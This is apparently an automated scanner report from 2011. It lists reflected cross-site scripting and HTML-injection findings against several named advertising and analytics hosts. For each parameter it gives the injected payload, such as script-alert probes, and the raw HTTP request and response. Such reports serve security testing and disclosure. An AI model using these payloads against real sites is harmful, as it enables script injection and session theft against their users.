The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"142eba33132 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9305"%3balert(1)//021a273d1f6 was submitted in the time parameter. This input was echoed as c9305";alert(1)//021a273d1f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca77"><a>c294b5ef411 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /csscca77"><a>c294b5ef411/ie6.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:00:57 GMT Content-Length: 7345 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 494db"><a>6e7eb28cf72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie6.css494db"><a>6e7eb28cf72 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Tue, 08 Mar 2011 12:01:06 GMT Content-Length: 17333 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48324"><a>c25c764c259 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css48324"><a>c25c764c259/ie7.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:00:58 GMT Content-Length: 7345 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed0b"><a>317e5feaa62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie7.cssaed0b"><a>317e5feaa62 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Tue, 08 Mar 2011 12:01:06 GMT Content-Length: 17337 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad56"><a>19b70861037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css3ad56"><a>19b70861037/screen-optimized.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:09 GMT Content-Length: 7366 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9d"><a>c0abe3b0a1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css/screen-optimized.css15e9d"><a>c0abe3b0a1c HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:14 GMT Content-Length: 7366 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db870"><a>fdae50e431d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /jsdb870"><a>fdae50e431d/concat.js HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:10 GMT Content-Length: 7346 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2875a"><a>d3812daf843 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js/concat.js2875a"><a>d3812daf843 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 08 Mar 2011 12:01:18 GMT Content-Length: 15188 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1ac8a<script>alert(1)</script>d2fe5350c6d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /url/shares.json?url=http%3A%2F%2Fwww.metrolyrics.com%2F&callback=_ate.cbs.sc_httpwwwmetrolyricscom1ac8a<script>alert(1)</script>d2fe5350c6d HTTP/1.1 Host: api-public.addthis.com Proxy-Connection: keep-alive Referer: http://www.metrolyrics.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; uid=4d5af32c71c2e1a5; psc=6
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=300 Content-Type: application/javascript;charset=UTF-8 Date: Mon, 07 Mar 2011 00:56:15 GMT Content-Length: 91 Connection: close
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload ec0bc<script>alert(1)</script>d87256e279b was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=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
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Mon, 07 Mar 2011 01:39:55 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 84 Connection: keep-alive
Unknown API key: (8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b)
The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 5c7fd<script>alert(1)</script>bf08636ce95 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=5c7fd<script>alert(1)</script>bf08636ce95 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=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
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Mon, 07 Mar 2011 01:41:04 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 58 Connection: keep-alive
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b0c8a<a>3637f5c2d52 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /viapi?action=pixel&id=f9622925b0c8a<a>3637f5c2d52 HTTP/1.1 Host: api.dimestore.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pixel_d51770430=1
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f092f<script>alert(1)</script>49bca32207c was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf092f<script>alert(1)</script>49bca32207c&n=ar_int_p84053757&1299459393565 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Homepage&placement=MW_HOME_300_TOP&groupid=5557007329&quantseg= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 00:55:55 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload c534e<script>alert(1)</script>d15bf7170c1 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8c534e<script>alert(1)</script>d15bf7170c1&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:03 GMT
Date: Mon, 07 Mar 2011 01:47:03 GMT
Connection: close
Content-Length: 3594
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 75841<script>alert(1)</script>a90132d1976 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=321281375841<script>alert(1)</script>a90132d1976&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:09 GMT
Date: Mon, 07 Mar 2011 01:47:09 GMT
Connection: close
Content-Length: 3594
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload beb29<script>alert(1)</script>35101d2c181 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15=beb29<script>alert(1)</script>35101d2c181 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:10 GMT
Date: Mon, 07 Mar 2011 01:47:10 GMT
Connection: close
Content-Length: 3594
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fdeb6<script>alert(1)</script>18adce1c522 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404fdeb6<script>alert(1)</script>18adce1c522&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:04 GMT
Date: Mon, 07 Mar 2011 01:47:04 GMT
Connection: close
Content-Length: 3594
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 99c56<script>alert(1)</script>ef484687d18 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=1599c56<script>alert(1)</script>ef484687d18&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:05 GMT
Date: Mon, 07 Mar 2011 01:47:05 GMT
Connection: close
Content-Length: 3594
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 919e4<script>alert(1)</script>921de2591d1 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005919e4<script>alert(1)</script>921de2591d1&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:06 GMT
Date: Mon, 07 Mar 2011 01:47:06 GMT
Connection: close
Content-Length: 3594
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ba08c<script>alert(1)</script>3eeb0c57d13 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=ba08c<script>alert(1)</script>3eeb0c57d13&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:07 GMT
Date: Mon, 07 Mar 2011 01:47:07 GMT
Connection: close
Content-Length: 3594
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed75e<script>alert(1)</script>15cdaeb4955 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=ed75e<script>alert(1)</script>15cdaeb4955&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:08 GMT
Date: Mon, 07 Mar 2011 01:47:08 GMT
Connection: close
Content-Length: 3594
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f03"><script>alert(1)</script>26e9f608a62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:47:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89066"><script>alert(1)</script>3bb9319201a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:47:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e846f"><script>alert(1)</script>5513091fadf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:48:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
